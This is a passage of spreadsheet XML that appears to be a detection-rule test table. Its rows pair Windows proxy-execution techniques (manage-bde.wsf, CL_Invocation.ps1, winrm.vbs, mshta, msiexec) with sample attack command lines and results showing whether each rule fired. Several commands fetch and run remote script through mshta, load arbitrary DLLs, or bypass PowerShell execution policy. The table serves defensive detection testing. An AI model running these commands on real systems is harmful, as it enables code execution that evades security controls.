          <t>proc_creation_win_lolbin_manage_bde</t>
        </is>
      </c>
      <c r="C2875" s="43" t="inlineStr">
        <is>
          <t>Potential Manage-bde.wsf Abuse To Proxy Execution</t>
        </is>
      </c>
      <c r="D2875" s="43" t="inlineStr">
        <is>
          <t>c363385c-f75d-4753-a108-c1a8e28bdbda</t>
        </is>
      </c>
      <c r="E2875" s="43" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\manage-bde.wsf C:\Users\Public\m.txt &amp;&amp; cscript.exe //e:jscript C:\Users\Public\m.txt</t>
        </is>
      </c>
      <c r="F2875" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2875" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2875" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2875" s="43" t="inlineStr">
        <is>
          <t>UtilityFunctions.ps1 Proxy Dll (0403d67d-6227-4ea8-8145-4e72db7da120); UtilityFunctions.ps1 Proxy Dll (0403d67d-6227-4ea8-8145-4e72db7da120); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J2875" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2875" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2876" ht="15.75" customHeight="1" s="42">
      <c r="A2876" s="43" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B2876" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_manage_bde</t>
        </is>
      </c>
      <c r="C2876" s="43" t="inlineStr">
        <is>
          <t>Potential Manage-bde.wsf Abuse To Proxy Execution</t>
        </is>
      </c>
      <c r="D2876" s="43" t="inlineStr">
        <is>
          <t>c363385c-f75d-4753-a108-c1a8e28bdbda</t>
        </is>
      </c>
      <c r="E2876" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd /d C:\\Windows\\System32\\ &amp;&amp; cscript.exe //nologo manage-bde.wsf"</t>
        </is>
      </c>
      <c r="F2876" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2876" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2876" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2876" s="43" t="inlineStr">
        <is>
          <t>UtilityFunctions.ps1 Proxy Dll (0403d67d-6227-4ea8-8145-4e72db7da120); UtilityFunctions.ps1 Proxy Dll (0403d67d-6227-4ea8-8145-4e72db7da120)</t>
        </is>
      </c>
      <c r="J2876" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2876" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2877" ht="15.75" customHeight="1" s="42">
      <c r="A2877" s="43" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B2877" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_manage_bde</t>
        </is>
      </c>
      <c r="C2877" s="43" t="inlineStr">
        <is>
          <t>Potential Manage-bde.wsf Abuse To Proxy Execution</t>
        </is>
      </c>
      <c r="D2877" s="43" t="inlineStr">
        <is>
          <t>c363385c-f75d-4753-a108-c1a8e28bdbda</t>
        </is>
      </c>
      <c r="E2877" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c ^"cd /d C:\Windows\System32\ ^&amp;^&amp; cscript.exe //nologo manage-bde.wsf^"</t>
        </is>
      </c>
      <c r="F2877" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2877" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2877" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2877" s="43" t="inlineStr">
        <is>
          <t>UtilityFunctions.ps1 Proxy Dll (0403d67d-6227-4ea8-8145-4e72db7da120); UtilityFunctions.ps1 Proxy Dll (0403d67d-6227-4ea8-8145-4e72db7da120)</t>
        </is>
      </c>
      <c r="J2877" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2877" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2878" ht="15.75" customHeight="1" s="42">
      <c r="A2878" s="43" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B2878" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cl_invocation</t>
        </is>
      </c>
      <c r="C2878" s="43" t="inlineStr">
        <is>
          <t>Potential Process Execution Proxy Via CL_Invocation.ps1</t>
        </is>
      </c>
      <c r="D2878" s="43" t="inlineStr">
        <is>
          <t>a0459f02-ac51-4c09-b511-b8c9203fc429</t>
        </is>
      </c>
      <c r="E2878" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command "Import-Module 'CL_Invocation.ps1'; $method = 'Sync' + 'Invoke'; Get-Item Function:\$method | ForEach-Object { &amp; $_ 'calc.exe' ' ' }"</t>
        </is>
      </c>
      <c r="F2878" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2878" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2878" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2878" s="43" t="inlineStr">
        <is>
          <t>Potential Process Execution Proxy Via CL_Invocation.ps1 (a0459f02-ac51-4c09-b511-b8c9203fc429); Potential Process Execution Proxy Via CL_Invocation.ps1 (a0459f02-ac51-4c09-b511-b8c9203fc429)</t>
        </is>
      </c>
      <c r="J2878" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2878" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2879" ht="15.75" customHeight="1" s="42">
      <c r="A2879" s="43" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B2879" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cl_invocation</t>
        </is>
      </c>
      <c r="C2879" s="43" t="inlineStr">
        <is>
          <t>Potential Process Execution Proxy Via CL_Invocation.ps1</t>
        </is>
      </c>
      <c r="D2879" s="43" t="inlineStr">
        <is>
          <t>a0459f02-ac51-4c09-b511-b8c9203fc429</t>
        </is>
      </c>
      <c r="E2879" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -c "Import-Module 'CL_Invocation.ps1'; $method = 'Sync' + 'Invoke'; Get-Item Function:\$method | ForEach-Object { &amp; $_ 'calc.exe' ' ' }"</t>
        </is>
      </c>
      <c r="F2879" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2879" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2879" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2879" s="43" t="inlineStr">
        <is>
          <t>Potential Process Execution Proxy Via CL_Invocation.ps1 (a0459f02-ac51-4c09-b511-b8c9203fc429); Potential Process Execution Proxy Via CL_Invocation.ps1 (a0459f02-ac51-4c09-b511-b8c9203fc429)</t>
        </is>
      </c>
      <c r="J2879" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2879" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2880" ht="15.75" customHeight="1" s="42">
      <c r="A2880" s="43" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B2880" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cl_invocation</t>
        </is>
      </c>
      <c r="C2880" s="43" t="inlineStr">
        <is>
          <t>Potential Process Execution Proxy Via CL_Invocation.ps1</t>
        </is>
      </c>
      <c r="D2880" s="43" t="inlineStr">
        <is>
          <t>a0459f02-ac51-4c09-b511-b8c9203fc429</t>
        </is>
      </c>
      <c r="E2880" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command "Import-Module 'CL_Invocation.ps1'; $method = 'Sync' + 'Invoke'; &amp; (Get-Item Function:\$method) 'calc.exe' ' '"</t>
        </is>
      </c>
      <c r="F2880" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2880" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2880" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2880" s="43" t="inlineStr">
        <is>
          <t>Potential Process Execution Proxy Via CL_Invocation.ps1 (a0459f02-ac51-4c09-b511-b8c9203fc429); Potential Process Execution Proxy Via CL_Invocation.ps1 (a0459f02-ac51-4c09-b511-b8c9203fc429)</t>
        </is>
      </c>
      <c r="J2880" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2880" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2881" ht="15.75" customHeight="1" s="42">
      <c r="A2881" s="43" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B2881" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cl_invocation</t>
        </is>
      </c>
      <c r="C2881" s="43" t="inlineStr">
        <is>
          <t>Potential Process Execution Proxy Via CL_Invocation.ps1</t>
        </is>
      </c>
      <c r="D2881" s="43" t="inlineStr">
        <is>
          <t>a0459f02-ac51-4c09-b511-b8c9203fc429</t>
        </is>
      </c>
      <c r="E2881" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command "Import-Module 'CL_Invocation.ps1'; $method = 'SyncInvoke'; &amp; $method calc.exe ' '"</t>
        </is>
      </c>
      <c r="F2881" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2881" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2881" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2881" s="43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2881" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2881" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2882" ht="15.75" customHeight="1" s="42">
      <c r="A2882" s="43" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B2882" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cl_loadassembly</t>
        </is>
      </c>
      <c r="C2882" s="43" t="inlineStr">
        <is>
          <t>Assembly Loading Via CL_LoadAssembly.ps1</t>
        </is>
      </c>
      <c r="D2882" s="43" t="inlineStr">
        <is>
          <t>c57872c7-614f-4d7f-a40d-b78c8df2d30d</t>
        </is>
      </c>
      <c r="E2882" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Import-Module CL_LoadAssembly.ps1; Get-Item -Path function:LoadAssemblyFromPath | Select-Object -ExpandProperty ScriptBlock | . -args 'malicious.dll' , 'Namespace' , 'Class'"</t>
        </is>
      </c>
      <c r="F2882" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2882" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2882" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2882" s="43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2882" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2882" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2883" ht="15.75" customHeight="1" s="42">
      <c r="A2883" s="43" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B2883" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_cl_loadassembly</t>
        </is>
      </c>
      <c r="C2883" s="43" t="inlineStr">
        <is>
          <t>Assembly Loading Via CL_LoadAssembly.ps1</t>
        </is>
      </c>
      <c r="D2883" s="43" t="inlineStr">
        <is>
          <t>c57872c7-614f-4d7f-a40d-b78c8df2d30d</t>
        </is>
      </c>
      <c r="E2883" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -File CL_LoadAssembly.ps1; $func = 'LoadAssembly'+'FromNS'; &amp; $func 'malicious.dll' 'Target.Namespace' 'Target.Class'</t>
        </is>
      </c>
      <c r="F2883" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2883" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2883" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2883" s="43" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript (cea72823-df4d-4567-950c-0b579eaf0846)</t>
        </is>
      </c>
      <c r="J2883" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2883" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2884" ht="15.75" customHeight="1" s="42">
      <c r="A2884" s="43" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B2884" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_winrm_awl_bypass</t>
        </is>
      </c>
      <c r="C2884" s="43" t="inlineStr">
        <is>
          <t>AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl</t>
        </is>
      </c>
      <c r="D2884" s="43" t="inlineStr">
        <is>
          <t>074e0ded-6ced-4ebd-8b4d-53f55908119d</t>
        </is>
      </c>
      <c r="E2884" s="43" t="inlineStr">
        <is>
          <t>copy cscript.exe moved_cscript.exe &amp;&amp; moved_cscript.exe //nologo winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty</t>
        </is>
      </c>
      <c r="F2884" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2884" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2884" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2884" s="43" t="inlineStr">
        <is>
          <t>Potential Dropper Script Execution Via WScript/CScript (cea72823-df4d-4567-950c-0b579eaf0846)</t>
        </is>
      </c>
      <c r="J2884" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2884" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2885" ht="15.75" customHeight="1" s="42">
      <c r="A2885" s="43" t="inlineStr">
        <is>
          <t>t1216</t>
        </is>
      </c>
      <c r="B2885" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_winrm_awl_bypass</t>
        </is>
      </c>
      <c r="C2885" s="43" t="inlineStr">
        <is>
          <t>AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl</t>
        </is>
      </c>
      <c r="D2885" s="43" t="inlineStr">
        <is>
          <t>074e0ded-6ced-4ebd-8b4d-53f55908119d</t>
        </is>
      </c>
      <c r="E2885" s="43" t="inlineStr">
        <is>
          <t>copy cscript.exe moved_cscript.exe &amp;&amp; moved_cscript.exe /nologo winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty</t>
        </is>
      </c>
      <c r="F2885" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2885" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2885" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2885" s="43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2885" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2885" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2886" ht="15.75" customHeight="1" s="42">
      <c r="A2886" s="43" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
      <c r="B2886" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_http</t>
        </is>
      </c>
      <c r="C2886" s="43" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE</t>
        </is>
      </c>
      <c r="D2886" s="43" t="inlineStr">
        <is>
          <t>b98d0db6-511d-45de-ad02-e82a98729620</t>
        </is>
      </c>
      <c r="E2886" s="43" t="inlineStr">
        <is>
          <t>mshta.exe javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct').Exec();close()</t>
        </is>
      </c>
      <c r="F2886" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2886" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2886" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2886" s="43" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE (b98d0db6-511d-45de-ad02-e82a98729620); Suspicious JavaScript Execution Via Mshta.EXE (67f113fa-e23d-4271-befa-30113b3e08b1)</t>
        </is>
      </c>
      <c r="J2886" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2886" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2887" ht="15.75" customHeight="1" s="42">
      <c r="A2887" s="43" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
      <c r="B2887" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_http</t>
        </is>
      </c>
      <c r="C2887" s="43" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE</t>
        </is>
      </c>
      <c r="D2887" s="43" t="inlineStr">
        <is>
          <t>b98d0db6-511d-45de-ad02-e82a98729620</t>
        </is>
      </c>
      <c r="E2887" s="43" t="inlineStr">
        <is>
          <t>mshta.exe javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105.001/src/mshta.sct')).Exec();close();</t>
        </is>
      </c>
      <c r="F2887" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2887" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2887" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2887" s="43" t="inlineStr">
        <is>
          <t>Suspicious JavaScript Execution Via Mshta.EXE (67f113fa-e23d-4271-befa-30113b3e08b1)</t>
        </is>
      </c>
      <c r="J2887" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2887" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2888" ht="15.75" customHeight="1" s="42">
      <c r="A2888" s="43" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
      <c r="B2888" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_http</t>
        </is>
      </c>
      <c r="C2888" s="43" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE</t>
        </is>
      </c>
      <c r="D2888" s="43" t="inlineStr">
        <is>
          <t>b98d0db6-511d-45de-ad02-e82a98729620</t>
        </is>
      </c>
      <c r="E2888" s="43" t="inlineStr">
        <is>
          <t>mshta.exe "javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct').Exec();close();"</t>
        </is>
      </c>
      <c r="F2888" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2888" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2888" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2888" s="43" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE (b98d0db6-511d-45de-ad02-e82a98729620); Suspicious JavaScript Execution Via Mshta.EXE (67f113fa-e23d-4271-befa-30113b3e08b1)</t>
        </is>
      </c>
      <c r="J2888" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2888" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2889" ht="15.75" customHeight="1" s="42">
      <c r="A2889" s="43" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
      <c r="B2889" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_http</t>
        </is>
      </c>
      <c r="C2889" s="43" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE</t>
        </is>
      </c>
      <c r="D2889" s="43" t="inlineStr">
        <is>
          <t>b98d0db6-511d-45de-ad02-e82a98729620</t>
        </is>
      </c>
      <c r="E2889" s="43" t="inlineStr">
        <is>
          <t>mshta.exe javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct').Exec();close();</t>
        </is>
      </c>
      <c r="F2889" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2889" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2889" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2889" s="43" t="inlineStr">
        <is>
          <t>Suspicious JavaScript Execution Via Mshta.EXE (67f113fa-e23d-4271-befa-30113b3e08b1)</t>
        </is>
      </c>
      <c r="J2889" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2889" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2890" ht="15.75" customHeight="1" s="42">
      <c r="A2890" s="43" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
      <c r="B2890" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_http</t>
        </is>
      </c>
      <c r="C2890" s="43" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE</t>
        </is>
      </c>
      <c r="D2890" s="43" t="inlineStr">
        <is>
          <t>b98d0db6-511d-45de-ad02-e82a98729620</t>
        </is>
      </c>
      <c r="E2890" s="43" t="inlineStr">
        <is>
          <t>mshta.exe \\live.sysinternals.com\tools\payload.hta</t>
        </is>
      </c>
      <c r="F2890" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2890" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2890" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2890" s="43" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE (b98d0db6-511d-45de-ad02-e82a98729620); Suspicious JavaScript Execution Via Mshta.EXE (67f113fa-e23d-4271-befa-30113b3e08b1)</t>
        </is>
      </c>
      <c r="J2890" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2890" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2891" ht="15.75" customHeight="1" s="42">
      <c r="A2891" s="43" t="inlineStr">
        <is>
          <t>t1218.005</t>
        </is>
      </c>
      <c r="B2891" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_mshta_javascript</t>
        </is>
      </c>
      <c r="C2891" s="43" t="inlineStr">
        <is>
          <t>Suspicious JavaScript Execution Via Mshta.EXE</t>
        </is>
      </c>
      <c r="D2891" s="43" t="inlineStr">
        <is>
          <t>67f113fa-e23d-4271-befa-30113b3e08b1</t>
        </is>
      </c>
      <c r="E2891" s="43" t="inlineStr">
        <is>
          <t>mshta.exe  javascript:a=GetObject("script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct").Exec();close()</t>
        </is>
      </c>
      <c r="F2891" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2891" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2891" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2891" s="43" t="inlineStr">
        <is>
          <t>Remotely Hosted HTA File Executed Via Mshta.EXE (b98d0db6-511d-45de-ad02-e82a98729620)</t>
        </is>
      </c>
      <c r="J2891" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2891" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2892" ht="15.75" customHeight="1" s="42">
      <c r="A2892" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B2892" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_dll</t>
        </is>
      </c>
      <c r="C2892" s="43" t="inlineStr">
        <is>
          <t>DllUnregisterServer Function Call Via Msiexec.EXE</t>
        </is>
      </c>
      <c r="D2892" s="43" t="inlineStr">
        <is>
          <t>84f52741-8834-4a8c-a413-2eb2269aa6c8</t>
        </is>
      </c>
      <c r="E2892" s="43" t="inlineStr">
        <is>
          <t>c:\windows\system32\msiexec.exe /z "C:\AtomicRedTeam\atomics\T1218.007\bin\MSIRunner.dll"</t>
        </is>
      </c>
      <c r="F2892" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2892" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2892" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2892" s="43" t="inlineStr">
        <is>
          <t>DllUnregisterServer Function Call Via Msiexec.EXE (84f52741-8834-4a8c-a413-2eb2269aa6c8)</t>
        </is>
      </c>
      <c r="J2892" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2892" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2893" ht="15.75" customHeight="1" s="42">
      <c r="A2893" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B2893" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_dll</t>
        </is>
      </c>
      <c r="C2893" s="43" t="inlineStr">
        <is>
          <t>DllUnregisterServer Function Call Via Msiexec.EXE</t>
        </is>
      </c>
      <c r="D2893" s="43" t="inlineStr">
        <is>
          <t>84f52741-8834-4a8c-a413-2eb2269aa6c8</t>
        </is>
      </c>
      <c r="E2893" s="43" t="inlineStr">
        <is>
          <t>msiexec.exe -zpayload.dll</t>
        </is>
      </c>
      <c r="F2893" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2893" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2893" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2893" s="43" t="inlineStr">
        <is>
          <t>DllUnregisterServer Function Call Via Msiexec.EXE (84f52741-8834-4a8c-a413-2eb2269aa6c8)</t>
        </is>
      </c>
      <c r="J2893" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2893" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2894" ht="15.75" customHeight="1" s="42">
      <c r="A2894" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B2894" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_dll</t>
        </is>
      </c>
      <c r="C2894" s="43" t="inlineStr">
        <is>
          <t>DllUnregisterServer Function Call Via Msiexec.EXE</t>
        </is>
      </c>
      <c r="D2894" s="43" t="inlineStr">
        <is>
          <t>84f52741-8834-4a8c-a413-2eb2269aa6c8</t>
        </is>
      </c>
      <c r="E2894" s="43" t="inlineStr">
        <is>
          <t>msiexec.exe /z payload.dll</t>
        </is>
      </c>
      <c r="F2894" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2894" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2894" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2894" s="43" t="inlineStr">
        <is>
          <t>DllUnregisterServer Function Call Via Msiexec.EXE (84f52741-8834-4a8c-a413-2eb2269aa6c8)</t>
        </is>
      </c>
      <c r="J2894" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2894" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2895" ht="15.75" customHeight="1" s="42">
      <c r="A2895" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B2895" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_execute_dll</t>
        </is>
      </c>
      <c r="C2895" s="43" t="inlineStr">
        <is>
          <t>Suspicious Msiexec Execute Arbitrary DLL</t>
        </is>
      </c>
      <c r="D2895" s="43" t="inlineStr">
        <is>
          <t>6f4191bb-912b-48a8-9ce7-682769541e6d</t>
        </is>
      </c>
      <c r="E2895" s="43" t="inlineStr">
        <is>
          <t>c:\windows\system32\msiexec.exe /y "C:\AtomicRedTeam\atomics\T1218.007\bin\MSIRunner.dll"</t>
        </is>
      </c>
      <c r="F2895" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2895" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2895" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2895" s="43" t="inlineStr">
        <is>
          <t>Suspicious Msiexec Execute Arbitrary DLL (6f4191bb-912b-48a8-9ce7-682769541e6d)</t>
        </is>
      </c>
      <c r="J2895" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2895" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2896" ht="15.75" customHeight="1" s="42">
      <c r="A2896" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B2896" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_execute_dll</t>
        </is>
      </c>
      <c r="C2896" s="43" t="inlineStr">
        <is>
          <t>Suspicious Msiexec Execute Arbitrary DLL</t>
        </is>
      </c>
      <c r="D2896" s="43" t="inlineStr">
        <is>
          <t>6f4191bb-912b-48a8-9ce7-682769541e6d</t>
        </is>
      </c>
      <c r="E2896" s="43" t="inlineStr">
        <is>
          <t>c:\windows\system32\msiexec.exe  /y "C:\AtomicRedTeam\atomics\T1218.007\bin\MSIRunner.dll"</t>
        </is>
      </c>
      <c r="F2896" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2896" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2896" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2896" s="43" t="inlineStr">
        <is>
          <t>Suspicious Msiexec Execute Arbitrary DLL (6f4191bb-912b-48a8-9ce7-682769541e6d); Potential Command Line Path Traversal Evasion Attempt (1327381e-6ab0-4f38-b583-4c1b8346a56b); Potential Command Line Path Traversal Evasion Attempt (1327381e-6ab0-4f38-b583-4c1b8346a56b)</t>
        </is>
      </c>
      <c r="J2896" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2896" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2897" ht="15.75" customHeight="1" s="42">
      <c r="A2897" s="43" t="inlineStr">
        <is>
          <t>t1218.007</t>
        </is>
      </c>
      <c r="B2897" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_msiexec_execute_dll</t>
        </is>
      </c>
      <c r="C2897" s="43" t="inlineStr">
        <is>
          <t>Suspicious Msiexec Execute Arbitrary DLL</t>
        </is>
      </c>
      <c r="D2897" s="43" t="inlineStr">
        <is>
          <t>6f4191bb-912b-48a8-9ce7-682769541e6d</t>
        </is>
      </c>
      <c r="E2897" s="43" t="inlineStr">
        <is>
          <t>c:\windows\system32\msiexec.exe -y "C:\AtomicRedTeam\atomics\T1218.007\bin\MSIRunner.dll"</t>
        </is>
      </c>
      <c r="F2897" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2897" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2897" s="43" t="b">
        <v>0</v>
      </c>
